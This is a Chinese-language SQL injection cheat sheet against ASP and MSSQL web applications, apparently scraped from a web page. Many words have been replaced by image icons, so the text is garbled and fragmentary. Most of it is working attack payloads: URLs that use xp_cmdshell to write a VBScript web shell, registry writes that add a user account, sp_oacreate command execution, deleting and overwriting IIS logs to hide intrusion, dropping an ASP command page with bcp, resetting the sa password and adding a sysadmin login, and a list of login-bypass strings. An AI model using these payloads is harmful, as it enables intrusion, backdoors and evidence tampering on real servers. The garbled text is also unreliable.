![](/icons/21262dou.gif)
![](/icons/21262dou.gif)
![](/icons/21262dou2.gif)
1、 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
用^转义
![](/icons/21262zifu.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
2、 http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
显示SQL系统版本:
Microsoft VBScript 编译器
![](/icons/21262cuowu.gif)
![](/icons/21262cuowu.gif)
缺少 'End'
/iisHelp/common/500-100.asp
![](/icons/21262dou.gif)
Microsoft OLE DB Provider for ODBC Drivers
![](/icons/21262cuowu.gif)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760
(Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation
Desktop Engine _disibledevent=>漏洞时
![](/icons/21262dou.gif)
在这 3种漏洞中找到对应
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
![](/icons/21262dou.gif)
例如“select * from mytable where id in(1)”
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262de.gif)
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
from mytable where id=1”
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
![](/icons/21262de.gif)
后原来
![](/icons/21262de.gif)
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
暂且就叫这种类型
![](/icons/21262de.gif)
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262yi.gif)
![](/icons/21262zifu.gif)
![](/icons/21262dou2.gif)
![](/icons/21262dou.gif)
“select * from mytable where name in(‘firstsee’)”
![](/icons/21262de.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
4、 http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*)
FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
判断xp_cmdshell扩展存储过程是否存在
![](/icons/21262dou2.gif)
5、 http://192.168.1.5/display.asp?keyno=188;EXEC%20master.dbo.xp_regwrite%
20'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1',
'REG_SZ','cmd.exe%20/c%20net user test ptlove /add'
向启动组中写入命令行和执行
![](/icons/21262chengxu.gif)
6、 db_name">http://192.168.1.5/display.asp?keyno=188%20and%200<>db_name
![](/icons/21262kh.gif)
查看当前
![](/icons/21262de.gif)
![](/icons/21262cuowu.gif)
![](/icons/21262cuowu.gif)
缺少 'End'
/iisHelp/common/500-100.asp
![](/icons/21262dou.gif)
Microsoft OLE DB Provider for ODBC Drivers
![](/icons/21262cuowu.gif)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type
![](/icons/21262int.gif)
/display.asp
![](/icons/21262dou.gif)
7、 列出当前所有
![](/icons/21262de.gif)
8、 不需xp_cmdshell支持在有注入漏洞
![](/icons/21262de.gif)
CREATE TABLE mytmp(info VARCHAR(400),ID
![](/icons/21262int.gif)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run
![](/icons/21262de.gif)
![](/icons/21262de.gif)
![](/icons/21262chengxu.gif)
![](/icons/21262de.gif)
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--
![](/icons/21262yinwei.gif)
![](/icons/21262de.gif)
![](/icons/21262yi.gif)
![](/icons/21262dou.gif)
![](/icons/21262yi.gif)
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
DROP TABLE MYTMP
----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs
![](/icons/21262set.gif)
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END
以下是
![](/icons/21262yi.gif)
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs
![](/icons/21262set.gif)
以下是
![](/icons/21262yi.gif)
![](/icons/21262chengxu.gif)
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
SQL下两种执行CMD命令
![](/icons/21262de.gif)
先删除7.18号日志:
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
再考贝
![](/icons/21262yi.gif)
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'
(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END
9、 用UPDATE来更新表中
![](/icons/21262de.gif)
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin
![](/icons/21262set.gif)
www用户密码
![](/icons/21262de.gif)
![](/icons/21262dou.gif)
10、 利用表内容导成文件功能
SQL有BCP命令
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
![](/icons/21262dou.gif)
![](/icons/21262yi.gif)
![](/icons/21262dou.gif)
然后在表中
![](/icons/21262yi.gif)
![](/icons/21262yi.gif)
![](/icons/21262yi.gif)
![](/icons/21262dou.gif)
![](/icons/21262dou2.gif)
命令行格式如下:
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost
–U sa –P upload('S'参数为执行查询
![](/icons/21262de.gif)
![](/icons/21262dou.gif)
![](/icons/21262dou.gif)
![](/icons/21262dou.gif)
最终上传了
![](/icons/21262yi.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
10、创建表、播入数据和读取数据
![](/icons/21262de.gif)
 创建表:
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
 往表里播入数据:
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255)
select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,
@result output insert
![](/icons/21262int.gif)
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255)
exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE',
'SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots',
'/' ,@result output insert
![](/icons/21262int.gif)
 从表里读取数据:
' and 1=(select count(*) from cyfd where gyfd >1)--
 删除临时表:
';drop table cyfd;--
12、通过SQL语句直接更改sa
![](/icons/21262de.gif)
 update master.dbo.sysxlogins
![](/icons/21262set.gif)
CBB30267F53B9451B7189CA67AF19A1FC944AA5
0CBB30267F53B9451B7189CA67AF19A1FC
where sid=0x01,这样sa
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
呵呵
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
![](/icons/21262dou.gif)
![](/icons/21262de.gif)
![](/icons/21262smhl.gif)
![](/icons/21262smhr.gif)
![](/icons/21262dou2.gif)
 查看本机所有
![](/icons/21262de.gif)
select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins
 更改sa口令思路方法:用sql综合利用工具连接后
![](/icons/21262dou.gif)
exec sp_password NULL,'新密码','sa'
13、查询dvbbs库中所有
![](/icons/21262de.gif)
 select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
 select * from dvbbs.dbo.syscolumns where id=1426104121
14、手工备份当前数据库
完全备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name
![](/icons/21262kh.gif)
@a to disk=@s WITH formAT--
差异备份:
;declare @a sysname,@s nvarchar(4000)
select @a=db_name
![](/icons/21262kh.gif)
@a to disk=@s WITH DIFFERENTIAL,formAT—
15、添加和删除
![](/icons/21262yi.gif)
![](/icons/21262de.gif)
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin
cmd.exe /c isql -E /U alma /P /i K:\test.qry
16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
就可以列出库ChouYFD中所有
![](/icons/21262de.gif)
![](/icons/21262de.gif)
![](/icons/21262dou2.gif)
Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0
17、
 http://www.test.cn/zgrdw/common/
image_view.jsp?sqlstr=select%20*%20from
%20rdweb.dbo.syscolumns (where id=1234)
列出rdweb库中所有表中
![](/icons/21262de.gif)
 select * from dvbbs.dbo.syscolumns where id=5575058
列出库dvbbs中表id=5575058
![](/icons/21262de.gif)
18、删除记录命令:delete from Dv_topic where boardid=5 and topicid=7978
19、绕过登录验证进入后台
![](/icons/21262de.gif)
1)' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6)or 1=1--
7) or ’a=’a
8)" or "a"="a
9) ’) or (’a’=’a
10) ") or ("a"="a
11) ) or (1=1
20、查看WEB网站WebSite安装目录命令:
 cscript c:\inetpub\
adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果
![](/icons/21262dou.gif)
![](/icons/21262yi.gif)
![](/icons/21262yi.gif)
![](/icons/21262yi.gif)
![](/icons/21262de.gif)
最新评论